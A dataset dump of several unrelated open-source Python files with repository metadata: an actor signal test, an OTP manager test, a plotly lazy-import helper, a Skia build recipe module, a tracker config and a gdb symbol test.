signame, response = testSignal.split('-')
parent = asys.createActor(ParentActor)
assert 'world' == asys.ask(parent, 'hello', smallwait)
child_pid = asys.ask(parent, 'child', smallwait*3)
assert child_pid # not 0 or None
os.kill(child_pid, eval(signame))
# Child is not killed and continues running
time.sleep(0.02) # allow signal to be delivered
assert response == asys.ask(parent, 'hello', smallwait)
|
lib/__init__.py
|
uwitec/LEHome
| 151 |
102106
|
import command, speech, sound, model, helper
|
tests/test_managers_otp.py
|
aphex3k/specter-desktop
| 683 |
102107
|
<reponame>aphex3k/specter-desktop
import os
from cryptoadvance.specter.managers.otp_manager import OtpManager
import time
def test_OtpManager(empty_data_folder):
# A OtpManager manages Otp, one-time-passwords
# via json-files in an empty data folder
otpm = OtpManager(data_folder=empty_data_folder)
assert os.path.isfile(os.path.join(empty_data_folder, "otps.json"))
# initialization will load from the folder but it's empty at first
assert otpm.data == {} # but you shouldn't access data directly anyway
# an otp looks like this:
an_otp = {
"otp": "aOxO42IeM-aRB4WjBIAQRA",
"created_at": 1618491877.546648,
"expiry": 1617495477.546648,
}
otpm.add_new_user_otp(an_otp)
yet_another_otp = {
"otp": "nPfouONJmUgS642MitqPkg",
"created_at": time.time(),
"expiry": time.time() + 60 * 60, # plus 1 h
}
assert otpm.validate_new_user_otp(an_otp["otp"]) == False
otpm.add_new_user_otp(yet_another_otp)
assert otpm.validate_new_user_otp(an_otp["otp"]) == False
assert otpm.validate_new_user_otp(yet_another_otp["otp"]) == True
otpm.remove_new_user_otp(an_otp["otp"])
# If it doesn't exist, False as well
assert otpm.validate_new_user_otp(an_otp["otp"]) == False
# anything gets you False
assert otpm.validate_new_user_otp("anything") == False
|
env/lib/python3.8/site-packages/_plotly_utils/importers.py
|
acrucetta/Chicago_COVI_WebApp
| 11,750 |
102142
|
<filename>env/lib/python3.8/site-packages/_plotly_utils/importers.py
import importlib
def relative_import(parent_name, rel_modules=(), rel_classes=()):
"""
Helper function to import submodules lazily in Python 3.7+
Parameters
----------
rel_modules: list of str
list of submodules to import, of the form .submodule
rel_classes: list of str
list of submodule classes/variables to import, of the form ._submodule.Foo
Returns
-------
tuple
Tuple that should be assigned to __all__, __getattr__ in the caller
"""
module_names = {rel_module.split(".")[-1]: rel_module for rel_module in rel_modules}
class_names = {rel_path.split(".")[-1]: rel_path for rel_path in rel_classes}
def __getattr__(import_name):
# In Python 3.7+, lazy import submodules
# Check for submodule
if import_name in module_names:
rel_import = module_names[import_name]
return importlib.import_module(rel_import, parent_name)
# Check for submodule class
if import_name in class_names:
rel_path_parts = class_names[import_name].split(".")
rel_module = ".".join(rel_path_parts[:-1])
class_name = import_name
class_module = importlib.import_module(rel_module, parent_name)
return getattr(class_module, class_name)
raise AttributeError(
"module {__name__!r} has no attribute {name!r}".format(
name=import_name, __name__=parent_name
)
)
__all__ = list(module_names) + list(class_names)
def __dir__():
return __all__
return __all__, __getattr__, __dir__
|
infra/bots/recipe_modules/run/api.py
|
pospx/external_skia
| 2,151 |
102166
|
<filename>infra/bots/recipe_modules/run/api.py
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0201
from recipe_engine import recipe_api
TEST_DEFAULT_ASSET_VERSION = '42'
class SkiaStepApi(recipe_api.RecipeApi):
def __init__(self, *args, **kwargs):
"""Initialize the recipe module."""
super(SkiaStepApi, self).__init__(*args, **kwargs)
self._already_ran = {}
self._ccache = None
self._checked_for_ccache = False
self._failed = []
def check_failure(self):
"""Raise an exception if any step failed."""
if self._failed:
raise self.m.step.StepFailure('Failed build steps: %s' %
', '.join([f.name for f in self._failed]))
@property
def failed_steps(self):
return self._failed[:]
def run_once(self, fn, *args, **kwargs):
if not fn.__name__ in self._already_ran:
self._already_ran[fn.__name__] = fn(*args, **kwargs)
return self._already_ran[fn.__name__]
def readfile(self, filename, *args, **kwargs):
"""Convenience function for reading files."""
name = kwargs.pop('name', 'read %s' % self.m.path.basename(filename))
return self.m.file.read_text(name, filename, *args, **kwargs)
def writefile(self, filename, contents):
"""Convenience function for writing files."""
return self.m.file.write_text('write %s' % self.m.path.basename(filename),
filename, contents)
def rmtree(self, path):
"""Wrapper around api.file.rmtree."""
self.m.file.rmtree('rmtree %s' % self.m.path.basename(path), path)
def asset_version(self, asset_name, skia_dir, test_data=None):
"""Return the contents of VERSION for the given asset as a string.
If test_data is not specified, reads the property
'test_<asset_name>_version' or if not present, uses
TEST_DEFAULT_ASSET_VERSION."""
version_file = skia_dir.join(
'infra', 'bots', 'assets', asset_name, 'VERSION')
if not test_data:
test_data = self.m.properties.get(
'test_%s_version' % asset_name, TEST_DEFAULT_ASSET_VERSION)
return self.m.file.read_text('Get %s VERSION' % asset_name,
version_file,
test_data=test_data).rstrip()
def __call__(self, steptype, name, abort_on_failure=True,
fail_build_on_failure=True, **kwargs):
"""Run a step. If it fails, keep going but mark the build status failed."""
try:
with self.m.env(self.m.vars.default_env):
return steptype(name=name, **kwargs)
except self.m.step.StepFailure as e:
if fail_build_on_failure:
self._failed.append(e)
if abort_on_failure:
raise
def with_retry(self, steptype, name, attempts, between_attempts_fn=None,
abort_on_failure=True, fail_build_on_failure=True, **kwargs):
for attempt in xrange(attempts):
step_name = name
if attempt > 0:
step_name += ' (attempt %d)' % (attempt + 1)
try:
res = self(steptype, name=step_name, abort_on_failure=True,
fail_build_on_failure=fail_build_on_failure, **kwargs)
if attempt > 0 and fail_build_on_failure:
del self._failed[-attempt:]
return res
except self.m.step.StepFailure:
if attempt == attempts - 1:
if abort_on_failure:
raise
elif between_attempts_fn:
between_attempts_fn(attempt+1)
|
tests/conftest.py
|
zenoone/deepqmc
| 224 |
102211
|
<filename>tests/conftest.py
import torch
torch.manual_seed(0)
|
cftracker/config/cn_config.py
|
Existever/PyCFTrackers
| 231 |
102217
|
<gh_stars>100-1000
class CNConfig:
interp_factor = 0.075
sigma = 0.2
lambda_= 0.01
output_sigma_factor=1./16
padding=1
cn_type = 'pyECO'
|
tests/gdb/print_symbol.py
|
cohortfsllc/cohort-cocl2-sandbox
| 2,151 |
102229
|
<gh_stars>1000+
# -*- python -*-
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import gdb_test
class PrintSymbolTest(gdb_test.GdbTest):
def test_print_symbol(self):
self.gdb.Command('break set_global_var')
self.gdb.ResumeAndExpectStop('continue', 'breakpoint-hit')
self.assertEquals(self.gdb.Eval('global_var'), '2')
self.assertEquals(self.gdb.Eval('arg'), '1')
self.gdb.ResumeAndExpectStop('finish', 'function-finished')
self.assertEquals(self.gdb.Eval('global_var'), '1')
self.assertEquals(self.gdb.Eval('local_var'), '3')
if __name__ == '__main__':
gdb_test.Main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.